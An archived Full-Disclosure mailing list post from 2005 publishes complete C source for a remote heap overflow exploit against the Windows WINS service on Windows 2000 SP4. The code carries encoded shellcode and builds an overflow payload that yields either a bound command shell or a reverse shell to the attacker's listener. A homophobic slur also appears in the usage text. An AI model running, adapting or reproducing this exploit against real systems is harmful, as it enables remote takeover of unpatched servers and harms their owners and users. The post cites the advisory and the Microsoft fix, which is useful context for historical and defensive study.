lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon Apr  4 17:27:51 2005
From: class101 at hat-squad.com (class101@...-SQUAD.com)
Subject: Microsoft Windows Internet Name Service
	(WINS)Remote Heap Overflow Exploit

fixed a code error in v0.2 , sorry for the access violation :)


-------------------------------------------------------------
class101
Jr. Researcher
Hat-Squad.com
-------------------------------------------------------------
----- Original Message -----
From: "class101@...-SQUAD.com" <class101@...-squad.com>
To: "Full-Disclosure" <Full-Disclosure@...ts.grok.org.uk>;
<vulnwatch@...nwatch.org>; <bugtraq@...urityfocus.com>; <milw0rm@...il.com>
Sent: Monday, April 04, 2005 3:05 PM
Subject: [Full-disclosure] Microsoft Windows Internet Name Service
(WINS)Remote Heap Overflow Exploit


>
> class101.org for a clean code.
>
> /*
>                        Windows Internet Name Service (WINS)
>                            Remote Heap Buffer Overflow
>                        ------------------------------------
>                        ------------------------------------
>
> Advisory credits:
> ----------------
>
>   Nicolas Waisman of Immunity Inc. (www.immunitysec.com)
>
> Advisory link:
> ----------------
>
>   immunitysec.com/downloads/instantanea.pdf
>
> Fix:
> ----------------
>
>   support.microsoft.com/kb/870763 (MS04-045)
>
> Exploit method:
> ----------------
>
>   PEB (RtlEnterCriticalSection)
>
> Tested Working:
> ----------------
>
>   Win2k SP4          Server ENGLISH (should be all langages, not sure)
>   Win2k SP4 Advanced Server ENGLISH (should be all langages, not sure)
>                        (KB870763 removed!)
>
> Note:
> ----------------
>
>   A HAT-SQUAD view on this hole; exploitable and remaining critic for
> Windows 2000.
>   May need update for Windows 2003 due to the different
>   structure of wins.exe in it but the bug remain exploitable
>   with no KB870763 of course....
>   If you look closely at my code , you will notice two overwrites,
>   this is the difference between Server <=> Advanced Server, with an
>   el8 pad, repair, you catch them both.
>
> Greetings:
> ----------------
>
>   All guys at hat-squad and metasploit
>   also #n3ws at EFnet, useful to keep an eye on security.. (50 rsslinks)
>   and thanx you leku.
>
>
>                               -=[?class101.org]=-
>
> */
>
> #include <stdio.h>
> #include <string.h>
> #ifdef WIN32
> #include "winsock2.h"
> #pragma comment(lib, "ws2_32")
> #else
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <netinet/in.h>
> #include <netinet/in_systm.h>
> #include <netinet/ip.h>
> #include <netdb.h>
> #include <arpa/inet.h>
> #include <unistd.h>
> #include <stdlib.h>
> #include <fcntl.h>
> #endif
>
> char scode1[]=
> "\x33\xC9\x83\xE9"
> "\xAF\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13\xBB"
> "\x1E\xD3\x6A\x83\xEB\xFC\xE2\xF4\x47\x74\x38\x25\x53\xE7\x2C\x95"
> "\x44\x7E\x58\x06\x9F\x3A\x58\x2F\x87\x95\xAF\x6F\xC3\x1F\x3C\xE1"
> "\xF4\x06\x58\x35\x9B\x1F\x38\x89\x8B\x57\x58\x5E\x30\x1F\x3D\x5B"
> "\x7B\x87\x7F\xEE\x7B\x6A\xD4\xAB\x71\x13\xD2\xA8\x50\xEA\xE8\x3E"
> "\x9F\x36\xA6\x89\x30\x41\xF7\x6B\x50\x78\x58\x66\xF0\x95\x8C\x76"
> "\xBA\xF5\xD0\x46\x30\x97\xBF\x4E\xA7\x7F\x10\x5B\x7B\x7A\x58\x2A"
> "\x8B\x95\x93\x66\x30\x6E\xCF\xC7\x30\x5E\xDB\x34\xD3\x90\x9D\x64"
> "\x57\x4E\x2C\xBC\x8A\xC5\xB5\x39\xDD\x76\xE0\x58\xD3\x69\xA0\x58"
> "\xE4\x4A\x2C\xBA\xD3\xD5\x3E\x96\x80\x4E\x2C\xBC\xE4\x97\x36\x0C"
> "\x3A\xF3\xDB\x68\xEE\x74\xD1\x95\x6B\x76\x0A\x63\x4E\xB3\x84\x95"
> "\x6D\x4D\x80\x39\xE8\x4D\x90\x39\xF8\x4D\x2C\xBA\xDD\x76\xD3\x0F"
> "\xDD\x4D\x5A\x8B\x2E\x76\x77\x70\xCB\xD9\x84\x95\x6D\x74\xC3\x3B"
> "\xEE\xE1\x03\x02\x1F\xB3\xFD\x83\xEC\xE1\x05\x39\xEE\xE1\x03\x02"
> "\x5E\x57\x55\x23\xEC\xE1\x05\x3A\xEF\x4A\x86\x95\x6B\x8D\xBB\x8D"
> "\xC2\xD8\xAA\x3D\x44\xC8\x86\x95\x6B\x78\xB9\x0E\xDD\x76\xB0\x07"
> "\x32\xFB\xB9\x3A\xE2\x37\x1F\xE3\x5C\x74\x97\xE3\x59\x2F\x13\x99"
> "\x11\xE0\x91\x47\x45\x5C\xFF\xF9\x36\x64\xEB\xC1\x10\xB5\xBB\x18"
> "\x45\xAD\xC5\x95\xCE\x5A\x2C\xBC\xE0\x49\x81\x3B\xEA\x4F\xB9\x6B"
> "\xEA\x4F\x86\x3B\x44\xCE\xBB\xC7\x62\x1B\x1D\x39\x44\xC8\xB9\x95"
> "\x44\x29\x2C\xBA\x30\x49\x2F\xE9\x7F\x7A\x2C\xBC\xE9\xE1\x03\x02"
> "\x54\xD0\x33\x0A\xE8\xE1\x05\x95\x6B\x1E\xD3\x6A";
>
>
> char scode2[]=
> /*original vlad902's reverse shellcode from metasploit.com
>   NOT xored, modded by class101 for ca's xpl0it to remove the common
badchar
> "\x20"
>   original bytes + modded = 291 + 3 = 294 bytes reverse shellcode v1.31*/
> "\xFC\x6A\xEB\x52" /*modded adjusting jump*/
> "\xE8\xF9\xFF\xFF\xFF\x60\x8B\x6C\x24\x24\x8B\x45\x3C\x8B\x7C\x05"
> "\x78\x01\xEF"
> "\x83\xC7\x01" /*modded, adding 1 to edi*/
> "\x8B\x4F\x17" /*modded, adjusting ecx*/
> "\x8B\x5F\x1F" /*modded, adjusting ebx, "\x20" out, yeahouu ;>*/
> "\x01\xEB\xE3\x30\x49\x8B\x34\x8B\x01\xEE\x31\xC0\x99\xAC\x84\xC0"
> "\x74\x07\xC1\xCA\x0D\x01\xC2\xEB\xF4\x3B\x54\x24\x28\x75\xE3"
> "\x8B\x5F\x23" /*modded, adjusting ebx*/
> "\x01\xEB\x66\x8B\x0C\x4B"
> "\x8B\x5F\x1B" /*modded, adjusting ebx*/
> "\x01\xEB\x03\x2C\x8B\x89\x6C\x24\x1C\x61\xC3\x31\xC0\x64\x8B\x40"
> "\x30\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\x68\x8E\x4E\x0E"
> "\xEC\x50\xFF\xD6\x31\xDB\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32"
> "\x5F\x54\xFF\xD0\x68\xCB\xED\xFC\x3B\x50\xFF\xD6\x5F\x89\xE5\x66"
> "\x81\xED\x08\x02\x55\x6A\x02\xFF\xD0\x68\xD9\x09\xF5\xAD\x57\xFF"
> "\xD6\x53\x53\x53\x53\x43\x53\x43\x53\xFF\xD0\x68\x00\x00\x00\x00"
> "\x66\x68\x00\x00\x66\x53\x89\xE1\x95\x68\xEC\xF9\xAA\x60\x57\xFF"
> "\xD6\x6A\x10\x51\x55\xFF\xD0\x66\x6A\x64\x66\x68\x63\x6D\x6A\x50"
> "\x59\x29\xCC\x89\xE7\x6A\x44\x89\xE2\x31\xC0\xF3\xAA\x95\x89\xFD"
> "\xFE\x42\x2D\xFE\x42\x2C\x8D\x7A\x38\xAB\xAB\xAB\x68\x72\xFE\xB3"
> "\x16\xFF\x75\x28\xFF\xD6\x5B\x57\x52\x51\x51\x51\x6A\x01\x51\x51"
> "\x55\x51\xFF\xD0\x68\xAD\xD9\x05\xCE\x53\xFF\xD6\x6A\xFF\xFF\x37"
> "\xFF\xD0\x68\xE7\x79\xC6\x79\xFF\x75\x04\xFF\xD6\xFF\x77\xFC\xFF"
> "\xD0\x68\xEF\xCE\xE0\x60\x53\xFF\xD6\xFF\xD0";
>
> char bug[]=
> "\x00\x00\x07\xD0\x00\x00\xFF\x00\x05\x39\x1F\xBC\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
> "\x90\x90\x90\x90";
>
> char payload[256],payload2[4096];
> int tot;
>
> char pad[]="\x00\x00\x00\x00",padB[]="\xEB\x07";
> char ret1[]="\xFC\x20\x39\x05";
> char ret1b[]="\x20\xF0\xFD\x7F";
> char repair[]="\xC7\x40\x20\x60\x20\xF8\x77";
> char sip[3],spo[1];
>
> #ifdef WIN32
>  WSADATA wsadata;
> #endif
>
> void ver();
> void usage(char* us);
> void sl(int time);
>
> int main(int argc,char *argv[])
> {
>  ver();
>  int check1, check2;
>  unsigned long gip;
>  unsigned short gport;
>  char *what, *where, *os;
>  if
>
(strlen(argv[2])<7||argc==5||argc>6||argc<3||atoi(argv[1])>1||atoi(argv[1])<
> 1){usage(argv[0]);return -1;}
>  if (argc==6){if (strlen(argv[4])<7){usage(argv[0]);return -1;}}
> #ifndef WIN32
>  if (argc==6)
>  {
>    gip=inet_addr(argv[4])^(long)0x00000000;
>   gport=htons(atoi(argv[5]))^(short)0x0000;
>   memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
>   check1=strlen(&sip[0]);check2=strlen(&spo[0]);
>   if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
>    printf("[+] error, the IP has a null byte in hex...\n");return -1;}
>   if (check2 != 2){printf("[+] error, the PORT has a null byte in
> hex...\n");return -1;}
>  }
> #define Sleep  sleep
> #define SOCKET  int
> #define closesocket(s) close(s)
> #else
>  if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){printf("[+] wsastartup
> error\n");return -1;}
>  if (argc==6)
>  {
>   gip=inet_addr(argv[4])^(ULONG)0x00000000;
>   gport=htons(atoi(argv[5]))^(USHORT)0x0000;
>   memcpy(&sip[0], &gip, 4);memcpy(&spo[0], &gport, 2);
>   check1=strlen(&sip[0]);check2=strlen(&spo[0]);
>   if (check1 == 0||check1 == 1||check1 == 2||check1 == 3){
>    printf("[+] error, the IP has a null byte in hex...\n");return -1;}
>   if (check2 != 2){printf("[+] error, the PORT has a null byte in
> hex...\n");return -1;}
>  }
> #endif
>  int ip=htonl(inet_addr(argv[2])), port;
>  if (argc==4||argc==6){port=atoi(argv[3]);} else port=42;
>  SOCKET s;fd_set mask;struct timeval timeout; struct sockaddr_in server;
>  s=socket(AF_INET,SOCK_STREAM,0);
>  if (s==-1){printf("[+] socket() error\n");return -1;}
>  if (atoi(argv[1]) == 1){what=ret1;where=ret1b;os="Win2k SP4
Server
> ENGLISH\n[+]                       Win2k SP4 Advanced Server ENGLISH\n";}
>  printf("[+]               TARGET: %s\n",os);sl(1);
>  server.sin_family=AF_INET;
>  server.sin_addr.s_addr=htonl(ip);
>  server.sin_port=htons(port);
>  connect(s,( struct sockaddr *)&server,sizeof(server));
>  timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
>  switch(select(s+1,NULL,&mask,NULL,&timeout))
>  {
>   case -1: {printf("[+] select() error\n");closesocket(s);return -1;}
>   case 0: {printf("[+] connection failed\n");closesocket(s);return -1;}
>   default:
>   if(FD_ISSET(s,&mask))
>   {
>    printf("[+] connected\n");sl(1);
>    printf("[+] building the payload..\n");sl(1);
>
>
memset(payload,0x90,196);memcpy(payload+132,what,4);memcpy(payload+136,where
> ,4);
>    memcpy(&bug[84], what, 4);memcpy(&bug[88], where, 4);
>    memset(payload2,0x90,2100);
>    memcpy(payload2+252,padB,2);memcpy(payload2+52,padB,2);
>    memcpy(payload2+263,repair,7);memcpy(payload2+63,repair,7);
>    if (argc==6)
>    {
>     memcpy(&scode2[167], &gip, 4);
>     memcpy(&scode2[173], &gport, 2);
>     memcpy(payload2+350,scode2,strlen(scode2));
>    }
>    else memcpy(payload2+350,scode1,strlen(scode1));
>    printf("[+] sh0uting the heap!\n");sl(1);
>    if (send(s,bug,sizeof(bug)-1,0)==-1) { printf("[+] sending error, the
> server prolly rebooted.\n");return -1;}
>    if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the
> server prolly rebooted.\n");return -1;}
>    if (send(s,payload,strlen(payload),0)==-1) { printf("[+] sending error,
> the server prolly rebooted.\n");return -1;}
>    if (send(s,pad,sizeof(pad)-1,0)==-1) { printf("[+] sending error, the
> server prolly rebooted.\n");return -1;}
>    if (send(s,payload2,strlen(payload2),0)==-1) { printf("[+] sending
error,
> the server prolly rebooted.\n");return -1;}
>    sl(3);
>    tot=sizeof(bug)-1+(sizeof(pad)*2)-2+strlen(payload)+strlen(payload2);
>    printf("[+]\n[+] payload size: %d\n",tot);sl(1);
>    if (argc==6){printf("[+] payload sent, look at your listener, you
should
> get a shell\n");}
>    else printf("[+] payload sent, use telnet %s:101 to get a
> shell\n",inet_ntoa(server.sin_addr));
>    return 0;
>   }
>  }
>  closesocket(s);
> #ifdef WIN32
>  WSACleanup();
> #endif
>  return 0;
> }
>
>
> void usage(char* us)
> {
>  printf("
> \n");
>  printf("      [+]  . 101_WINS.exe Target VulnIP (bind mode)
>          \n");
>  printf("      [+]  . 101_WINS.exe Target VulnIP VulnPORT (bind mode)
> \n");
>  printf("      [+]  . 101_WINS.exe Target VulnIP VulnPORT GayIP GayPORT
> (reverse mode)   \n");
>  printf("TARGETS:
> \n");
>  printf("      [+] 1. Win2k SP4          Server English (*) - v5.0.2195
> \n");
>  printf("      [+] 1. Win2k SP4 Advanced Server English (*) - v5.0.2195
> \n");
>  printf("NOTE:
> \n");
>  printf("      The exploit bind a cmdshell port 101 or
> \n");
>  printf("      reverse a cmdshell on your listener.
> \n");
>  printf("      A wildcard (*) mean tested working, else, supposed working.
> \n");
>  printf("      A symbol   (-) mean all.
> \n");
>  printf("      Compilation msvc6, cygwin, Linux.
> \n");
>  printf("
> \n");
>  return;
> }
>
> void ver()
> {
>  printf("
> \n");
>  printf("
> ===================================================[v0.1]====\n");
>  printf("        ============Windows Internet Name Service
> (WINS)=============\n");
>  printf("        ============Remote Heap Buffer Overflow
> Exploit==============\n");
>  printf("        ======coded by class101=============[Hat-Squad.com
> 2005]=====\n");
>  printf("
> =============================================================\n");
>  printf("
> \n");
> }
>
> void sl(int time)
> {
> #ifdef WIN32
>    Sleep(time*1000);
> #else
>    Sleep(time);
> #endif
> }
>
>
> -------------------------------------------------------------
> class101
> Jr. Researcher
> Hat-Squad.com
> -------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ